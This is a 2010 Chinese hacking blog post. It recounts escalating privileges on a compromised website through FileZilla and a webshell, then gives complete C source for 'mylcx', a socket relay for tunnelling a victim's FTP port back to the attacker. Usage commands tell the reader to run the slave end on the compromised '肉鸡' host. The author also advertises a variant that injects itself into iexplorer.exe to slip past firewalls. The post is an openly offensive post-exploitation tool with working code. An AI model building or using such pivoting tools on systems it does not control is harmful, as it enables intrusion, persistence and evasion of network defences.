lcx不能转发ftp解决
作者:admin 日期:2010-06-15
上次搞一个站的时候,用的FileZilla提权,当时挺郁闷的。用的lcx把FileZilla的端口发出来了,用户也加了,结果ftp搞死搞活愣是发不出来,想用别的工具转发一下,结果一时没搞到免杀的。当时用的是写了个bat直接在webshell上执行了,算是提权了。后来想想着下次可能会有类似的情况呢,于是写了这个东西。
我没看过lcx的源码~所以不知道为什么它不能转发ftp
下面是我自己写的一个lcx,姑且叫做mylcx吧
(另外我还弄了一个穿墙的lcx,嘿嘿,其实也没什么技术含量了,就是把自己插到iexplorer.exe或者其他可使用网络的文件,像flashxp.exe ,等等了~有兴趣的加我qq:593953978,写个lcx或者其他随便表示一下就行)
mylcx -listen 这个命令跟lcx一样
mylcx -slave 本机端口 远程ip 远程端口
即把本机端口映射到远程ip的一个端口上
在本机执行:mylcx -listen 5000 21
在肉鸡上执行:mylcx -slave 21 你的ip 5000
然后连接ftp 127.0.0.1 就可以登录远程的ftp了
附上源码:(嘿嘿,英文不好,变量名都是乱起,而且比较乱,见笑了)
#include <stdio.h>
#include <winsock2.h>
#include <stdlib.h>
#pragma comment(lib,"Ws2_32")
HANDLE hevent;
typedef struct _s1ands2
{
SOCKET s1;
SOCKET s2;
} s1ands2;
typedef struct _info{
int listenorslave; //1-listen 2-slave
unsigned short listen_port1;
unsigned short listen_port2;
unsigned short slave_local;
char remoteip[16];
unsigned short remoteport;
} info;
DWORD WINAPI s1tos2(LPVOID p)
{
s1ands2* temp=(s1ands2*)p;
char buff[2048]={0};
int bytesdone;
SOCKET s1,s2;
s1=temp->s1;
s2=temp->s2;
while(1)
{
int errorcode;
bytesdone=recv(s1,buff,2048,0);
errorcode=GetLastError();
if(bytesdone<=0)
//if(bytesdone<=0)
{
SetEvent(hevent);
return 0;
}
printf("%d bytes=%d\n",errorcode,bytesdone);
bytesdone=send(s2,buff,bytesdone,0);
errorcode=GetLastError();
//if(errorcode>0)
if(bytesdone<=0)
{
SetEvent(hevent);
return 0;
}
}
return 0;
}
/*
DWORD WINAPI s2tos1(LPVOID p)
{
s1ands2* temp=(s1ands2*)p;
char buff[2048]={0};
int bytesdone;
SOCKET s1,s2;
s1=temp->s1;
s2=temp->s2;
while(1)
{
bytesdone=recv(s2,buff,2048,0);
send(s1,buff,bytesdone,0);
}
return 0;
}
*/
int lcxlisten(unsigned short p1,unsigned short p2)
{
SOCKET s1,s2,rs1,rs2;
unsigned short port1,port2;
int len1,len2;
port1=p1;
port2=p2;
s1=socket(AF_INET,SOCK_STREAM,0);
sockaddr_in addr1,addr2;
sockaddr_in raddr1,raddr2;
addr1.sin_family=AF_INET;
addr1.sin_addr.S_un.S_addr=INADDR_ANY;
addr1.sin_port=htons(port1);
addr2.sin_family=AF_INET;
addr2.sin_addr.S_un.S_addr=INADDR_ANY;
addr2.sin_port=htons(port2);
bind(s1,(const sockaddr *)&addr1,sizeof(addr1));
s2=socket(AF_INET,SOCK_STREAM,0);
bind(s2,(const sockaddr *)&addr2,sizeof(addr2));
listen(s1,5);
listen(s2,5);
len1=sizeof(raddr1);
len2=sizeof(raddr2);
printf("waiting on port %d...\n",port1);
rs1=accept(s1,(struct sockaddr *)&raddr1,&len1);
printf("%s connected\n",inet_ntoa(raddr1.sin_addr));
printf("wating on port %d...\n",port2);
rs2=accept(s2,(struct sockaddr *)&raddr2,&len2);
printf("go...\n");
s1ands2 temp1,temp2;
temp1.s1=rs1;
temp1.s2=rs2;
CreateThread(NULL,NULL,s1tos2,&temp1,NULL,NULL);
temp2.s1=rs2;
temp2.s2=rs1;
CreateThread(NULL,NULL,s1tos2,&temp2,NULL,NULL);
hevent=CreateEvent(NULL,false,false,NULL);
//hevent[1]=CreateEvent(NULL,false,false,NULL);
//WaitForMultipleObjects(2,&hevent,false,INFINITE);
WaitForSingleObject(hevent,INFINITE);
printf("end waiting1\n");
CloseHandle(hevent);
closesocket(rs1);
closesocket(rs2);
closesocket(s1);
closesocket(s2);
return 0;
}
int lcxslave(unsigned short local,char* remoteip,unsigned short remoteport)
{
WSADATA wsa;
WSAStartup(MAKEWORD(2,2),&wsa);
SOCKET s1,s2;
sockaddr_in addr1,addr2;
addr1.sin_family=AF_INET;
addr1.sin_addr.S_un.S_addr=inet_addr(remoteip);
addr1.sin_port=htons(remoteport);
s1=socket(AF_INET,SOCK_STREAM,0);
if(connect(s1,(const struct sockaddr*)&addr1,sizeof(addr1)))
{
closesocket(s1);
return 0;
}
s2=socket(AF_INET,SOCK_STREAM,0);
addr2.sin_family=AF_INET;
addr2.sin_addr.S_un.S_addr=inet_addr("127.0.0.1");
addr2.sin_port=htons(local);
if(connect(s2,(const struct sockaddr*)&addr2,sizeof(addr2)))
{
closesocket(s1);
closesocket(s2);
return 0;
}
s1ands2 temp,temp2;
temp.s1=s1;
temp.s2=s2;
CreateThread(NULL,NULL,s1tos2,&temp,NULL,NULL);
temp2.s1=s2;
temp2.s2=s1;
CreateThread(NULL,NULL,s1tos2,&temp2,NULL,NULL);
hevent=CreateEvent(NULL,false,false,NULL);
//hevent[1]=CreateEvent(NULL,false,false,NULL);
//WaitForMultipleObjects(2,&hevent,false,INFINITE);
WaitForSingleObject(hevent,INFINITE);
printf("end waiting2\n");
CloseHandle(hevent);
closesocket(s1);
closesocket(s2);
return 0;
}
int main(int argc, char* argv[])
{
WSADATA wsa;
WSAStartup(MAKEWORD(2,2),&wsa);
if(argc<2)
{
printf("usage:mylcx.exe -listen port1 port2\n"
"mylcx.exe -slave localport remoteip remoteport\n");
return 0;
}
if(strcmp(argv[1],"-listen")==0)
{
while(1){
lcxlisten(atoi(argv[2]),atoi(argv[3]));
Sleep(1000);
}
return 0;
}
if(strcmp(argv[1],"-slave")==0)
{
while(1)
{
lcxslave(atoi(argv[2]),argv[3],atoi(argv[4]));
Sleep(1000);
}
return 0;
}
//lcxlisten(5000,21);
//lcxslave(800,"127.0.0.1",5000);
return 0;
}